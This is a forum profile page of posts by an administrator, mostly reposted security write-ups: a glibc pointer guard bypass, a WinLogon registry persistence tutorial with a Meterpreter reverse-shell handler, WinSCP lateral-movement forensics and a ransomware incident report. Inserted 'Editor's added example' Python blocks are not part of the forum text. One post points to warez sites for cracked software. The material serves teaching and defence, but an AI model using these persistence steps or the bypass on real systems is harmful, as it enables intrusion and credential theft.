Nytro (Administrators)
Posts: 18785 · Days Won: 738

Everything posted by Nytro

  1. Do you crawl CVE Mitre/NIST NVD?
  2. Does anyone have access to Valorant? I was thinking they could give us that driver too.
  3. NetRipper now intercepts traffic from Google Chrome, Slack and GitHub Desktop - latest versions. https://github.com/NytroRST/NetRipper
  4. It doesn't matter that much which one you choose, as long as you learn on your own and actually find a job in the field while you are still at university.
  5. There are some sites where it is quite likely to show up at a reduced price: olx.ro, lajumate.ro, publi24.ro, okazii.ro
  6. There are 2 weeks left to register: https://www.cybersecuritychallenge.ro/
  7. HACKERS: Heroes of the Computer Revolution, by STEVEN LEVY. Download: http://www.temarium.com/wordpress/wp-content/documentos/Levy_S-Hackers-Heroes-Computer-Revolution.pdf
  8. Ubuntu Desktop. Download Ubuntu desktop and replace your current operating system, whether it's Windows or macOS, or run Ubuntu alongside it. Do you want to upgrade? Follow our simple guide. Link: https://ubuntu.com/download
  9. Hi, have you tried some cheap OBD2 gadgets to see if they help? They are the ones that connect to the phone over Bluetooth and cost 40-100 RON. You can use them with many free apps: Car Scanner (ELM227 or something like that), Torque, or if you want there is also a pro version. I see that hardware can be found for 220 RON, that OP COM. Doesn't it come with the required software? As for cracking it yourself, it is quite hard if you have no reverse engineering experience (e.g. ASM) and it can take some time. I don't know how many people would have time for that. The more practical solution would be to search the net until you find it, maybe on some Chinese sites or on warez/torrent sites.
  10. There are dedicated parental control applications and they do this quite well. As far as I know, some antivirus products also have such functionality.
  11. I don't play GTA, but these are the possibilities: 1. Per account - to check, make another account and try to play. 2. Per IP - to check, use a VPN and try to play with the same account. 3. Per game installation? That is, from whatever IP and account you play, from where you installed it. It's just an idea, probably not used. If it is per IP, maybe with a router restart you get another external IP. Maybe. If it is per account, I don't think there is anything you can do. Either way, you can talk to the admins of that game, on a forum somewhere, explain to them that you did nothing wrong (I am thinking, although I don't believe that) and ask them to unban you.
  12. As far as I knew, telecom operators are currently no longer allowed to lock phones. My suggestion would be to call the operator it is locked to and have them help you.
  13. Yes, for now it is private. If you are interested, or if anyone else is interested, I am waiting for a PM with an email address for an invitation to the program.
  14. Hi, we are looking for a colleague in the security team. We are looking for someone senior who knows web security very well, but other things as well (e.g. Windows, networking, cloud). More precisely, a person who knows advanced things about exploiting vulnerabilities, tips & tricks, bypasses, and who doesn't mind doing pentests with the help of the source code - that is, code review. You can apply here: https://www.linkedin.com/jobs/view/1699417011/ Or you can send me a private message. I also welcome any question about the position. Thanks, // Nytro
  15. What you found is not exactly critical and it is normal that they don't bother fixing it, especially since they probably don't have an internal security team. I don't see any "client information disclosure" if you are referring to GDPR. What you are doing is useful, but it is also risky for you - you can be sued, although I hope there are no longer "communist" companies that would do such a thing these days. Then, you shouldn't stress about "why don't they fix it?". It's their business, you did the right thing, you told them about the problems. And lastly, you shouldn't have any expectation from them to offer you something or to pay you. Some companies may do it, offer you some product of theirs or whatever, it would be nice, but the chances are pretty small, especially since the vulnerabilities are not exactly critical.
  16. There is this: https://www.qfxsoftware.com/ I don't know if it helps you at all.
  17. Probably, it looks like for persistence it uses that registry key to run PowerShell (11:45).
  18. Yes, it seems it says so there, silly me. I hadn't looked through the code, I was thinking it says somewhere in the Registry something from which the "immediate", or at least quick, execution would follow, not after a restart...
  19. apk-mitm: I haven't done anything on mobile for a long time, but as far as I knew, if an application is "debuggable", you can use Frida (for example) for runtime instrumentation. Do you need Android Studio? I really should take a look at this kind of thing again myself.
  20. Yes, it is also a kind of netcat, but one that also supports DNS and ICMP. It can be useful in cases where TCP/UDP doesn't work.
  21. ParamSpider : Parameter miner for humans

    Key Features :
    - Finds parameters from web archives of the entered domain.
    - Gives support to exclude urls with specific extensions.
    - Saves the output result in a nice and clean manner.
    - It mines the parameters from web archives (without interacting with the target host)

    Usage instructions :
    Note : Use python 3.7+
      $ git clone https://github.com/devanshbatham/ParamSpider
      $ cd ParamSpider
      $ pip3 install -r requirements.txt
      $ python3 paramspider.py --domain hackerone.com

    Usage options :
    1 - For a simple scan [without the --exclude parameter]
      $ python3 paramspider.py --domain hackerone.com
      -> Output ex : https://hackerone.com/test.php?q=FUZZ
    2 - For excluding urls with specific extensions
      $ python3 paramspider.py --domain hackerone.com --exclude php,jpg,svg
    3 - For finding nested parameters
      $ python3 paramspider.py --domain hackerone.com --level high
      -> Output ex : https://hackerone.com/test.php?p=test&q=FUZZ
    4 - Saving the results
      $ python3 paramspider.py --domain hackerone.com --exclude php,jpg --output hackerone.txt

    Example :
      $ python3 paramspider.py --domain bugcrowd.com --exclude woff,css,js,png,svg,php,jpg --output bugcrowd.txt

    Note : As it fetches the parameters from web archive data, the chances of false positives are high.

    My Twitter : Say hello : 0xAsm0d3us
    Wanna show support for the tool ? I will be more than happy if you will show some love for Animals by donating to Animal Aid Unlimited. Animal Aid Unlimited saves animals through street animal rescue, spay/neuter and education. Their mission is dedicated to the day when all living beings are treated with compassion and love. ✨
    Source: https://github.com/devanshbatham/ParamSpider
  22. Bypassing Pointer Guard in Linux's glibc
    April 12, 2020, Dr Silvio Cesare @silviocesare

    Summary
    Pointer guard is an exploit mitigation in glibc that applies to stored pointers and especially stored function pointers. A number of library calls can register function pointers that get executed later on. An example of this is registering an exit handler with atexit(). Stored function pointers are scrambled or mangled by XORing them with a secret in the thread data (fs:0x30) and applying a bitwise rotation. This mitigates control-flow hijacking by an attacker who would otherwise be able to overwrite the stored function pointer with a location of their choosing. In this blog post, I'll present a bypass for pointer guard in multithreaded applications where an attacker knows the libc base address and has an arbitrary read.

    Introduction
    Pointer guard is documented in glibc reference materials: https://sourceware.org/glibc/wiki/PointerEncryption. The mitigation provides a set of macros that mangle and demangle pointers. The API to use is PTR_MANGLE and PTR_DEMANGLE. For example, if an application wants to store a function pointer in *stored_ptr, it could use the following:
      *stored_ptr = PTR_MANGLE(ptr);
    And to demangle it:
      ptr = PTR_DEMANGLE(*stored_ptr);
    The pointer mangling works by XORing the pointer with an internal 64-bit secret, then performing a bitwise left rotation of 0x11 bits (on x86-64). Demangling is the reverse.

    Related Work
    After I tweeted the requirements for this attack, I was linked to http://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html. This is a similar attack to the one I present, with some specific differences. Interested readers are advised to review it.

    The Attack
    The attack is essentially a known-plaintext attack against the mangling operation. If we know the original pointer and its mangled version, we can recover the 64-bit secret. How do we get known plaintexts?
    The related work linked earlier shows one way to identify known plaintext. I will present another approach. Let's run grep -rw PTR_MANGLE glibc/ --include '*.c' and examine each reference. I can quickly see an interesting use: in thread initialization, we can see a function pointer table at a fixed address (__libc_pthread_functions). If we examine the first entry of this function pointer table, we can see that it points to __pthread_attr_destroy. This is enough to defeat pointer guard if we know the library base from an ASLR leak. This is shown in the following pseudo code:
      x = __libc_pthread_functions[0];
      secret = rotr64(x, 0x11) ^ &__pthread_attr_destroy;
    There is something else we can try. Is there a possibility that there is a mangled function pointer where the function pointer is equal to 0, or perhaps -1, or another fixed constant? I write some test code to recover the cookie in a multithreaded application, and then I take the results of:
      PTR_MANGLE(0);
      PTR_MANGLE((unsigned long)-1);
    In GDB using the GEF debugging plugin, I use pattern-search to find any such memory in the address space that has stored one of these mangled pointers with known plaintexts (pointers). I find one. __libc_pthread_functions[1] in my particular application has a mangled NULL pointer. To defeat pointer guard then, after program initialization, given the address of __libc_pthread_functions, is:
      secret = rotr64(__libc_pthread_functions[1], 0x11);
    From this point, an attacker can safely and correctly mangle their own pointers.

    Conclusion
    In this blog post, I presented an attack against the pointer guard exploit mitigation in Linux's glibc. The bypass requires the base address of libc and an arbitrary read.
    Source: https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html
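Editor's added example (not part of Nytro's post or of Silvio Cesare's article): the x86-64 mangling transform described in the post and the two secret-recovery tricks, modelled in Python so the arithmetic can be checked. The secret, the libc base, the offsets and the target address are constructed test inputs, not real addresses; `rotl64`/`rotr64` stand in for the `rol`/`ror` instructions glibc emits.

```python
import secrets

# Added example (editor's, not from the blog post): the x86-64 glibc pointer
# guard transform and the known-plaintext recovery of the secret it uses.
# Every address and the secret below are constructed test values.
MASK64 = (1 << 64) - 1
ROT = 0x11  # rotation amount used by PTR_MANGLE / PTR_DEMANGLE on x86-64


def rotl64(x: int, n: int) -> int:
    """Rotate a 64-bit value left by n bits."""
    n %= 64
    return ((x << n) | (x >> (64 - n))) & MASK64


def rotr64(x: int, n: int) -> int:
    """Rotate a 64-bit value right by n bits."""
    n %= 64
    return ((x >> n) | (x << (64 - n))) & MASK64


def ptr_mangle(ptr: int, secret: int) -> int:
    """PTR_MANGLE: XOR with the per-process secret (fs:0x30), then rol 0x11."""
    return rotl64((ptr ^ secret) & MASK64, ROT)


def ptr_demangle(mangled: int, secret: int) -> int:
    """PTR_DEMANGLE: ror 0x11, then XOR with the secret."""
    return (rotr64(mangled, ROT) ^ secret) & MASK64


def recover_secret_known_plaintext(mangled: int, plaintext: int) -> int:
    """Known-plaintext attack. Given a mangled pointer and the pointer it
    encodes (the post's example: __libc_pthread_functions[0], which holds
    &__pthread_attr_destroy, i.e. libc base + a fixed offset), undo the
    rotation and XOR the plaintext away to get the secret."""
    return (rotr64(mangled, ROT) ^ plaintext) & MASK64


def recover_secret_mangled_null(mangled: int) -> int:
    """Special case: a mangled NULL. XOR with 0 is the identity, so the
    secret is just the value rotated back."""
    return rotr64(mangled, ROT)


def forge_mangled_pointer(target: int, secret: int) -> int:
    """What the attacker writes over a stored function pointer once the
    secret is known: a correctly mangled pointer to their own target."""
    return ptr_mangle(target, secret)


def demo() -> bool:
    """Victim side stores two mangled entries; attacker side recovers the
    secret both ways and forges an entry that demangles to its target."""
    libc_base = 0x7FFFF7DC0000           # constructed ASLR leak
    attr_destroy_off = 0x8A4D0           # constructed offset, not glibc's
    secret = secrets.randbits(64)        # the hidden fs:0x30 value
    table0 = ptr_mangle(libc_base + attr_destroy_off, secret)
    table1 = ptr_mangle(0, secret)       # the mangled NULL the post found
    s1 = recover_secret_known_plaintext(table0, libc_base + attr_destroy_off)
    s2 = recover_secret_mangled_null(table1)
    attacker_target = libc_base + 0x12345   # constructed target address
    forged = forge_mangled_pointer(attacker_target, s1)
    return s1 == secret and s2 == secret and \
        ptr_demangle(forged, secret) == attacker_target


if __name__ == "__main__":
    print("pointer guard bypass demo:", "ok" if demo() else "FAILED")
```

The two recovery functions differ only in whether the plaintext is a known libc address or zero; on a 32-bit build the rotation amount and word size change, so the constants would have to be adjusted.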
  23. Windows Persistence using WinLogon
    Posted in Red Teaming on April 12, 2020 by Raj Chandel

    In this article, we are going to describe the ability of the WinLogon process to provide persistent access to the Target Machine.

    Table of Content
    - Introduction
    - Configurations used in Practical
    - Default Registry Key Values
    - Persistence using WinLogon
      - Using Userinit Key
      - Using the Shell Key
    - Detection
    - Mitigation

    Introduction
    The Winlogon process is a very important part of the Windows operating system, and Windows will be unusable without it. This process performs many important tasks related to the Windows sign-in process. For example, when you sign in, the Winlogon process is responsible for loading your user profile into the registry. Hence, each Windows user account is dependent on WinLogon to use the keys under HKEY_CURRENT_USER, which is unique for each user account. Winlogon has special hooks into the system and watches to see if you press Ctrl+Alt+Delete. This is known as the "secure attention sequence", and it's why some PCs may be configured to require you to press Ctrl+Alt+Delete before you sign in. This combination of keyboard shortcuts is constantly caught by Winlogon, which guarantees you're signing in on a secure desktop where other programs can't monitor the password you're typing or impersonate a sign-in dialog. The Windows Logon Application additionally monitors keyboard and mouse activity and is responsible for locking your PC and starting screen savers after a period of no activity. The Microsoft official site provides a more detailed, technical list of Winlogon's responsibilities.

    Configurations used in Practical
    Attacker: OS: Kali Linux 2020.1, IP: 192.168.1.112
    Target: OS: Windows 10, IP: 192.168.1.104

    Default Registry Key Values
    Now, as discussed in the introduction, the WinLogon process controls HKEY_CURRENT_USER. But being Windows proprietary software, its registry values are located in HKEY_LOCAL_MACHINE. If we want to take a look at the Registry Key Values for WinLogon, we will have to open the Registry Editor. This can be achieved by typing Regedit in the Run Panel. Then traverse to the following location:
      Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Now here, among a lot of other keys, we see that we have keys named Userinit and Shell of REG_SZ type. We will be using these keys to gain persistence over this machine. The scenario that can be related here is that the attacker gains a meterpreter session over the Target Machine. The attacker can use any method of their choice. Then he uses the meterpreter session to alter the Registry Keys in WinLogon to convert his session into a persistent session.

    Persistence using Userinit Key
    Transferring Malicious Executable
    We created a malicious executable file named raj.exe using the msfvenom tool. More about that here. Now, using the meterpreter session that we already obtained, we transfer this malicious executable to the Target Machine. We will be using the upload command of the meterpreter for this. After the file is successfully uploaded to the Target Machine, we ran the shell command.
      upload /root/raj.exe
    Modifying Registry Values
    Since we have the shell of the Target System, we used the "reg query" command to get information about the Userinit Key of WinLogon. We see that it has the default value we saw earlier. Now, using the "reg add" command, we modified the key value to hold the malicious executable as well.
      shell
      reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
      reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, raj.exe" /f
      reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit
    We ran the "reg query" command again to ensure that the values are indeed modified. We can also verify the modification manually, as shown in the image below.
    Gaining Persistent Shell
    Now that we have made the changes in the registry, we should be getting a persistent shell as soon as WinLogon is triggered. However, we need to have a listener set up for the session that is generated. The listener should have the same configuration of IP address and port that was used in crafting the payload. Here we can see that we have a persistent shell.
      use exploit/multi/handler
      set payload windows/x64/meterpreter/reverse_tcp
      set lhost 192.168.1.112
      set lport 4444
      exploit

    Persistence using Shell Key
    We got our persistence using the Userinit key. Now let's focus on another key that can be used to achieve persistence over the Target Machine. It is the Shell key. By default it holds explorer.exe, as shown below.
    Modifying Registry Values
    As we did in the previous practice, we will be gaining a meterpreter session, then we will be transferring the payload over to the Target Machine using the upload command. Then we will be adding the name of the executable to the Registry Value using the reg add command.
      upload /root/raj.exe
      shell
      reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
      reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, raj.exe" /f
    We can verify that the payload is indeed added to the Shell Key by going to the location in the Registry Editor:
      Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Gaining Persistent Shell
    Now that we have made the changes in the registry, we should be getting a persistent shell as soon as WinLogon is triggered. However, we need to have a listener set up for the session that is generated. The listener should have the same configuration of IP address and port that was used in crafting the payload. Here we can see that we have a persistent shell.
      use exploit/multi/handler
      set payload windows/x64/meterpreter/reverse_tcp
      set lhost 192.168.1.112
      set lport 4444
      exploit

    Detection
    Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.

    Mitigation
    Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting tools like AppLocker that are capable of auditing and/or blocking unknown DLLs. Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.

    We at Hacking Articles want to request everyone to stay at home and self-quarantine for the prevention of the spread of COVID-19. I am writing this article while working from home. Take care and be healthy!
    Reference: MITRE ATT&CK
    Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be contacted on Twitter and LinkedIn.
    Source: https://www.hackingarticles.in/windows-persistence-using-winlogon/
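Editor's added example (not part of Nytro's post or of the Hacking Articles write-up): the Detection section says to watch the Winlogon values for changes that do not match known software; this Python script turns that into a check over the text that `reg query ... /v Userinit` and `/v Shell` print, flagging any comma-separated entry that is not the stock `userinit.exe` or `explorer.exe`. The sample output strings are constructed to mirror the article's before/after values; the script does not touch a live registry.

```python
import ntpath

# Added example (editor's, not from the article): parse `reg query` output
# for the Winlogon Userinit and Shell values and flag any entry that is not
# the Windows default. The REG output strings below are constructed.

# Stock Windows 10 values: Userinit is the full path plus a trailing comma,
# Shell is just explorer.exe. Comparison is by basename, case-insensitive.
ALLOWED = {
    "userinit": {"userinit.exe"},
    "shell": {"explorer.exe"},
}


def parse_reg_query(output: str) -> dict:
    """Return {value_name: data} from `reg query <key> /v <name>` output.
    Value lines look like '    Userinit    REG_SZ    C:\\...'; the key path
    line and blank lines are skipped because their second field is not a
    REG_* type."""
    values = {}
    for line in output.splitlines():
        parts = line.strip().split(None, 2)
        if len(parts) >= 2 and parts[1].startswith("REG_"):
            values[parts[0]] = parts[2] if len(parts) == 3 else ""
    return values


def split_entries(data: str) -> list:
    """Winlogon values are comma-separated program lists, so both
    'C:\\Windows\\system32\\userinit.exe,' and 'explorer.exe, raj.exe'
    split into clean entries (the trailing comma yields nothing)."""
    return [e.strip() for e in data.split(",") if e.strip()]


def check_winlogon(output: str) -> dict:
    """Map each monitored value name to the entries that are not on its
    allow list. An empty dict means only the defaults are present."""
    findings = {}
    for name, data in parse_reg_query(output).items():
        allowed = ALLOWED.get(name.lower())
        if allowed is None:
            continue  # some other value under the key; not monitored here
        unexpected = [e for e in split_entries(data)
                      if ntpath.basename(e).lower() not in allowed]
        if unexpected:
            findings[name] = unexpected
    return findings


# Constructed samples: stock values, and the values after the article's
# `reg add ... /v Userinit /d "Userinit.exe, raj.exe"` and
# `reg add ... /v Shell /d "explorer.exe, raj.exe"`.
CLEAN = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
    Userinit    REG_SZ    C:\\Windows\\system32\\userinit.exe,
    Shell       REG_SZ    explorer.exe
"""

TAMPERED = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
    Userinit    REG_SZ    Userinit.exe, raj.exe
    Shell       REG_SZ    explorer.exe, raj.exe
"""

if __name__ == "__main__":
    print("clean   :", check_winlogon(CLEAN))
    print("tampered:", check_winlogon(TAMPERED))
```

Feed it the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"` (without `/v`, it lists every value, and the parser keeps only Userinit and Shell). Basename matching is deliberately loose; a stricter variant would also require the Userinit entry to be the full `C:\Windows\system32\userinit.exe` path, since a bare `Userinit.exe` is resolved by path search.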
  24. How to Detect Lateral Movements with WinSCP
    Forensics And Investigation, Mar 5 2020

    A common way for an attacker to move laterally within an environment is to use RDP. Forensically, we can use artifacts such as shellbags, link files and jumplists on the remote system to see what the attacker accessed when they used RDP into the system. Alternatively, an attacker can access a system remotely by using WinSCP. By using the WinSCP program, an attacker can browse folders and files on a remote system, copy them back to the system they are currently on, and also search the remote system for files.

    We will be working on a scenario where the attacker has already compromised a system on the network and is using WinSCP to browse to other computers on the same network. In this case, they could browse to HR systems looking for tax information, servers looking for databases or workstations looking for IP data. In comparison to RDP, when using WinSCP, very few artifacts are left on what they were doing on the remote system because attackers are not using the Windows Explorer shell. They can even open up remote documents from within a WinSCP text editor.

    Starting with Windows 10 1809 and Server 2019, FTP/SSH is part of the optional features that can be easily installed on Windows. A simple PowerShell command can install it. Furthermore, it automatically creates a firewall rule and adds an SSH user.
      powershell Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
      powershell Start-Service sshd
      powershell Set-Service -Name sshd -StartupType 'Automatic'

    An attacker commonly follows the below steps right after they breach a network:
    1) Dump admin credentials
    2) Enumerate systems to get IP addresses/Hostnames
    3) Push out PowerShell scripts to all systems en masse that do things such as disable firewalls, install backdoors and disable antivirus.
    Now that the "command to install SSH" task has been added, all these systems are accessible to connect to using WinSCP.

    The most interesting thing about WinSCP is that it comes with a portable version. The portable version makes it easy for an attacker to download and use. Many blog posts reference a registry key that contains settings for the program. However, the portable version does not store settings there.

    Forensically finding artifacts to help determine what was done on both the "staging" system and the remote systems on Windows 10 1909:
    Most of the artifacts related to WinSCP are located on the host where it was run. Running the program generates many of the common artifacts seen with file execution (Prefetch, shimcache, amcache, userassist, etc). However, the most important artifacts are the WinSCP.ini file and the SRUM database.

    WinSCP.ini file
    WinSCP.ini is a text file that contains configuration settings. It is located in the same directory as the WinSCP.exe file. At the end of a WinSCP session, the user is prompted to save their workspace. WinSCP saves valuable information in the WinSCP.ini file that can be useful to the investigation. This includes systems connected to, usernames, places on the local system where files were saved from the remote system, and the last path that was accessed on the local system. Examples of each of these configuration sections:
      [Configuration\CDCache]
      Support1@172.16.30.4=412F433A2F55736572732F<SNIP>
      user1@172.16.30.20=412F433A2F55736572732F<SNIP>
    Files have been saved in these folders:
      [Configuration\History\LocalTarget]
      0=C:%5CUsers%5CCrashOveride%5CDocuments%5CExfil%5C*.*
      1=C:%5CUsers%5CCrashOveride%5CDocuments%5CSystem3%5C*.
    Last folder opened on the local system:
      [Configuration\Interface\Commander\LocalPanel]
      DirViewParams=0;1|150,1;70,1;120,1;150,1;55,0;55,0;@96|5;4;0;1;2;3
      StatusBar=1
      DriveView=0
      DriveViewHeight=100
      DriveViewHeightPixelsPerInch=96
      DriveViewWidth=100
      DriveViewWidthPixelsPerInch=96
      LastPath=C:%5CUsers%5CCrashOveride%5CDocuments%5CExfil
    If the session settings are saved, you get a bonus section called Sessions, with the saved session name. The default is "My Workspace". This saves the last local directory and remote directory, along with a password.
      [Sessions\My%20Workspace/0000]
      HostName=172.16.30.4
      UserName=Support1
      LocalDirectory=C:%5CUsers%5Cuser1%5CDocuments%5CSystem3%5CW2s
      RemoteDirectory=/C:/Users/Acid%20Burn/Documents/W2s
      IsWorkspace=1
      Password=A35C435B9556B1237C2DFE15080F2<TRUNCATED>
    The WinSCP.ini file appears to be updated when the session closes. As such, using the last modified date of the WinSCP.ini file with a prefetch timestamp could give you an idea of how long the last session was. Looking at this WinSCP.ini file can help an examiner determine what an attacker may have been browsing to on a remote system, and what they may have saved on the local system, even if it was deleted afterwards.

    SRUM database
    The SRUM database collects information every hour on network usage on a per-application basis. It can be an excellent resource for figuring out how much data has been copied/downloaded using WinSCP. If you suspect WinSCP was used, parsing out the database can provide some details on how much data was transferred, what user account was associated with it, and the time frames in which it occurred.

    WinSCP Remote System Artifacts
    To determine whether WinSCP was used to browse a remote system, you can look for several things: event log entries, evidence of OpenSSH being installed, and file system timestamps. WinSCP can use any FTP/SSH server to connect to. If you suspect WinSCP may have been used, your artifacts may vary.

    1. OpenSSH artifacts
    In order for WinSCP to connect to a system, an FTP or SSH server must be running to accept the connection. Look for artifacts indicating these services exist. For OpenSSH, look for c:/Windows/System32/OpenSSH/sshd.exe, SSHD.exe prefetch files, and the sshd.exe service. Timestamps associated with these entries may help determine the first time the attacker used it to connect.
      Username        : sshd [1003]
      SID             : S-1-5-21-1445295406-4253784506-242647837-1003
      Full Name       : sshd
      User Comment    :
      Account Type    :
      Account Created : Sun Feb 23 06:48:08 2020 Z
      Name            :
      Last Login Date : Never
      Pwd Reset Date  : Sun Feb 23 06:48:08 2020 Z
      Pwd Fail Date   : Never
      Login Count     : 0
        --> Password does not expire
        --> Normal user account

    2. Event Log Entries
    There is an Event ID 4624 associated with the WinSCP client login. The login is a type 5 with the account name sshd_1860 and the domain of VIRTUAL USERS, and the process sshd.exe. This is followed by an entry in the OpenSSH Operational event log that records the connecting IP address and account used by WinSCP to connect.

    3. File Timestamps
    Once logged in, the attacker can use the program to effectively browse through folders, and even open up files via WinSCP, barely leaving any trace on the remote system. An indication this was occurring was that accessed dates were changed on folders and files clicked on or copied. However, access dates are NOT a reliable artifact to use when drawing conclusions and must be used with other corroborating artifacts. Below is an example of files and folders that were copied.
    Source: https://www.threathunting.se/2020/03/05/how-to-detect-lateral-movements-with-winscp/
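Editor's added example (not part of Nytro's post or of the threathunting.se article): a small Python parser that pulls the investigator-relevant fields the article lists (CDCache hosts and users, LocalTarget save folders, LastPath, and saved Sessions) out of a WinSCP.ini. The INI text is constructed to match the layout shown above with invented hosts, users and paths; the CDCache values are decoded as plain ASCII hex because the article's visible prefix `412F433A2F55736572732F` decodes to `A/C:/Users/`, and it is an assumption here that the rest of the value follows the same encoding. Stored passwords are only reported as present, not decoded.

```python
import configparser
from urllib.parse import unquote

# Added example (editor's, not from the article): extract hosts, users,
# local save folders and the last local path from a WinSCP.ini. The INI
# below is constructed; it is not a real capture.
SAMPLE_INI = """\
[Configuration\\CDCache]
Support1@172.16.30.4=412F433A2F55736572732F43726173684F766572696465
user1@172.16.30.20=412F433A2F55736572732F7573657231

[Configuration\\History\\LocalTarget]
0=C:%5CUsers%5CCrashOveride%5CDocuments%5CExfil%5C*.*
1=C:%5CUsers%5CCrashOveride%5CDocuments%5CSystem3%5C*.*

[Configuration\\Interface\\Commander\\LocalPanel]
StatusBar=1
LastPath=C:%5CUsers%5CCrashOveride%5CDocuments%5CExfil

[Sessions\\My%20Workspace/0000]
HostName=172.16.30.4
UserName=Support1
LocalDirectory=C:%5CUsers%5Cuser1%5CDocuments%5CSystem3%5CW2s
RemoteDirectory=/C:/Users/Acid%20Burn/Documents/W2s
IsWorkspace=1
Password=A35C435B9556B1237C2DFE15080F2
"""


def _hex_to_text(value: str) -> str:
    """CDCache values: assumed to be ASCII hex (the article's visible prefix
    decodes that way). Fall back to the raw value if it is not valid hex."""
    try:
        return bytes.fromhex(value).decode("ascii")
    except ValueError:
        return value


def parse_winscp_ini(text: str) -> dict:
    """Return a dict with remote_targets, local_targets, last_local_path and
    sessions. Paths are percent-decoded (WinSCP writes '\\' as %5C)."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep key case: HostName, LastPath, ...
    cp.read_string(text)
    report = {"remote_targets": [], "local_targets": [],
              "last_local_path": None, "sessions": []}
    for section in cp.sections():
        name = unquote(section)  # "My%20Workspace" -> "My Workspace"
        items = dict(cp.items(section))
        if name == "Configuration\\CDCache":
            for key, val in items.items():
                user, _, host = key.partition("@")
                report["remote_targets"].append(
                    {"user": user, "host": host, "cache": _hex_to_text(val)})
        elif name == "Configuration\\History\\LocalTarget":
            report["local_targets"] = [unquote(items[k])
                                       for k in sorted(items, key=int)]
        elif name == "Configuration\\Interface\\Commander\\LocalPanel":
            report["last_local_path"] = unquote(items.get("LastPath", ""))
        elif name.startswith("Sessions\\"):
            report["sessions"].append({
                "name": name[len("Sessions\\"):],
                "host": items.get("HostName"),
                "user": items.get("UserName"),
                "local_dir": unquote(items.get("LocalDirectory", "")),
                "remote_dir": unquote(items.get("RemoteDirectory", "")),
                "has_stored_password": bool(items.get("Password")),
            })
    return report


def hosts(report: dict) -> list:
    """Every remote host seen in either the directory cache or a session."""
    seen = {t["host"] for t in report["remote_targets"]}
    seen |= {s["host"] for s in report["sessions"] if s["host"]}
    return sorted(seen)


if __name__ == "__main__":
    rep = parse_winscp_ini(SAMPLE_INI)
    print("hosts:", hosts(rep))
    print("saved to:", rep["local_targets"])
    print("last local path:", rep["last_local_path"])
    for s in rep["sessions"]:
        print("session:", s)
```

Run it against a real `WinSCP.ini` with `parse_winscp_ini(open(path, encoding="utf-8").read())`; combine the host list with the sshd event log entries on each remote system to confirm which connections actually happened.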
  25. GoGoogle Ransomware
    April 4, 2020

    An attacker logged into the honeypot from 93.174.95[.]73, disabled security tools, dropped their toolkit and started recon. Recon was quickly followed by an onslaught of password dumping tools such as Mimikatz, Lazagne, rdpv, and more. After the attacker dumped credentials, they moved laterally to multiple machines using Network Port Scanner. Minutes later the attacker focused on a Domain Controller and started deploying ransomware.

    Interesting Artifacts
    There were a bunch of artifacts dropped during this compromise. Most of these are password dumping tools, with the exception of !start.cmd and Advanced IP Scanner. The !start.cmd script appears to use the above artifacts to dump credentials from the machine. The script is written to handle 64- and 32-bit systems, as it checks the processor architecture before running each of the password dumping tools. The first half of the script runs Mimikatz, Lazagne, BulletsPassView, netpass, PasswordFox, SniffPass, and WirelessKeyView. The second half of the script runs ChromePass, Dialupass, iepv, mailpv, mspass, OperaPassView, pspv, PstPassword, rdpv, RouterPassView, VNCPassView, and WebBrowserPassView before deleting the mimikatz files. The artifact can be downloaded here. One thing to notice here is the folder named passrecpk. After doing some further research, we believe this folder most likely correlates to the free NirSoft tool pack named passrecenc.zip. Most of the NirSoft tools above are in passrecenc.zip.

    The next artifact is a Mimikatz parser. The goal of this script is to parse out the Mimikatz output so it is easier for the actor to use passwords/NTLM. We saw the actors open up the Passwords.txt file, which included username:password for logged-in users. The artifact can be downloaded here.

    Another interesting artifact is Remote Desktop PassView (rpv.exe), created by NirSoft, which reveals passwords stored in .rdp files. This is a great example of why you shouldn't store passwords in rdp files.

    Example of the PowerShell scripts and other recon elements executed. We were not able to acquire these files, but here are our thoughts:
    - lubrute.ps1 - We believe this script was used to brute force local accounts.
    - adbrute.ps1 - We believe this script was used to brute force AD accounts.
    - Find-Pass.ps1 - We believe this script was used to run mimikatz and the other password dumping tools.
    - NetADPC.ps1 - We believe this script launched Network Port Scanner and helped with RDP connections.

    The ransomware was deployed in a manual fashion, requiring the actor to RDP to each machine that Network Port Scanner found. The specific executable looks to be new, currently identified as GoGoogle by id-ransomware.
      bild.exe
      MD5:    9330544a69b499f9b2ea79fd5a57bccc
      SHA1:   17cf9b71e0f8cf3068977c670499ed816e1b65ab
      SHA256: 8805ce23c95a5049ca6d9678f419848b3ace3f1a0cdd36d3867d7d827ab5f4e8
